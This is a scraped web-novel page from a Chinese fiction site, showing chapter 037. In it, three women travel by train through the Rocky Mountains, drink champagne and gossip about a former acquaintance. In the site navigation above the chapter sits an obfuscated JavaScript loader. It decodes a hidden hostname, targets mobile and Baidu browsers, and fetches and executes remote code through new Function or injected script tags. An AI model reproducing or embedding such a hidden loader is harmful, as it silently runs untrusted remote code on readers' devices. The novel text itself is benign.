98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

037原来(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

('037原来

Cherry对于晚栀来说,是另一道风景,是位尽情生活的人,教会她许多。

薛茹也来了,她正度过自己的gap year,潇潇洒洒四处游学。

一下飞机就兴冲冲:“去攀岩吧。”

Cherry和她一拍即合:“洛基山。”

所以她这个运动白痴也一起作陪,怎么也算半个东道主。

哎,这个该死的东方礼仪!

熟稔晚栀渣体质的薛茹道:“不会太累的,我们还不了解你吗?”

So……

此刻,她们正坐在登山者号上。

正是登山的好时节,天高风清,一路层林尽染,也算不虚此行。

观光列车遇上好风光会适当减速,Cherry正在摆弄微单,对着未受破坏的自然景观不断按下快门。

晚栀趁着间隙跟一旁对着风景呆滞的人道:“准备什么时候回家?”

薛茹朝白雪覆盖的山峰喃喃:“还没玩够呢。”

“有人向我打听过你。”

“我妈?”

“还有。”

一阵沉默,薛茹也没打算装傻下去:“你怎么说的?”

“我不知道啊。”最近才联系上的两位表姐妹哈哈大笑。

去年晚栀突然接到远在俄罗斯的电话,薛茹问她是不是在加州,可惜她正受邀去纽约参加兰洛的生日会。

想起薛茹和牧野关系被戳破之后的残局,晚栀提醒:“你这样不是办法哦。”

薛茹意有所指:“好聚好散,你应该比我更明白。”

“可你不能一直不回家。”提到这个晚栀觉得不对劲,“你们两个在玩什么啊?”这两年,牧野朋友圈经常出现固定女友,她亲爱的妹妹又行踪不定。

薛茹低声嘟囔:“我才没想跟他玩儿呢。”

“去哪玩儿?”Cherry收好相机过来打哈哈,拿出一个喷雾给晚栀,“转过去。”

晚栀拉开后衣领让她喷,她刚刚一直在无意识地在后颈抓痒。

“防蚊又消炎。”Cherry朝几个星星点点的暗紫喷了几下,“小心抓破了。”

薛茹继续刚刚的话题:“我在莫斯科碰到过奚扬,他也在加州?”

“Stanford。”加州的华人留学圈不算大,对这位行事低调却特立独行的计科系大神难免经常听闻。

薛茹惊讶:“你们竟然没见过?”

“也不是。”

“我知道。”

异口同声,有所知晓的Cherry忍不住跟着八卦:“去年轰趴。”

彻夜派对之后,晚栀撑着宿醉的脑袋准备驱车回家。

停车场密密麻麻,穿过狭窄的道路出去的时候一辆宾利横在半路,晚栀正准备按喇叭的时候车窗拉下来。

湿热的雨天空气依然滞塞,额发微湿的少年嘴里叼着烟,略皱的黑衬衫挽到手肘,单手撑着车窗听电话,眼睛直视前方未置一词把手机挂掉。

手停在喇叭钮上,晚栀耐心地等他抽完剩下半支烟。

轰趴的主办学姐一贯喜欢邀请各类精英,这位从高中就开始跳级并且不断出现在各类竞赛获奖名单上,他会出现不奇怪。

冷硬的侧面若隐若现间从未转动,直至烟头熄灭,引擎启动间隐约听到一声冷笑。

那是她最后一次见到他。

Cherry喋喋不休:“我上车她都没回神。”

她心里翻白眼:“我那是在想怎么找你算账。”

“Sorry。”某人下半夜烂醉把晚栀拳打脚踢之后关在了门外。

晚栀对薛茹抱怨道:“我那一个星期腰腹还有膝盖都是青的。”

“不过Johnny绝对是419太过、行动迟缓了。”Cherry眼神游移地岔开话题。

薛茹一知半解:“Johnny是奚扬?”

列车到达坎卢普斯 ,她们准备在那儿住一晚,收拾东西准备下车时Cherry随意回道:“对啊,John的弟弟当然叫Johnny。”

想起自己在俄罗斯时晚栀轻松的金蝉脱壳,薛茹若有所思:“也许你对于他是不同的。”

“你说错了,只不过是场游戏。”晚栀至今人仍然记得他说那句话的语气:“It&#039;s just a game.Come on.”

那语气,都谈不上冷漠,像是听人煞有其事地谈论白开水一样、多余。

“太多巧合了。”薛茹低叹。

都是旁观者清。

登山者号的服务相当到位,大件行李给工作人员登记即可。

三人一身轻地慢悠悠走在人流最后,列车一路食物供应不间断,所以她们也并不饿,倒是准备游一游小镇的湖边,算是消食。

“小酌一杯?”薛茹打开拿了一路的保温杯。

Cherry凑过去:“Champagne!”

尽管是亲姐妹,类似香槟装在保温杯里的戏码发生在薛茹身上,晚栀仍匪夷所思此人的脑回路,一边忍不住喝一口。

“Sorry。”马尾扫在她肩上。

“Hey!”Cherry眼疾手快地按正对方的肩膀。

后方有小孩子在嬉闹,行人避之不及,一阵兵荒马乱,晚栀正准备喝一口香槟结果胸口湿了一大片。

晚栀按下正欲数落的CHerry,对上不小心撞她的人:“小九?”

“对不起。”来人只是朝她抱歉的笑,眼尾的弧度机械。

“没事。”胸前一片沁凉,晚栀擦拭后,薛茹也提议回去。

回去立马洗了个热水澡,默默祈祷不要感冒。

许是暖气足,第二天依然神清气爽。

倒是几个小孩子病恹恹。

“昨晚玩得太疯,突然暴雨差点溺水。”后座一位家长如是说。

除去这个小插曲,一路平安。

“Chris?”晚栀刚离开洛基山就接到以前房东的电话。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间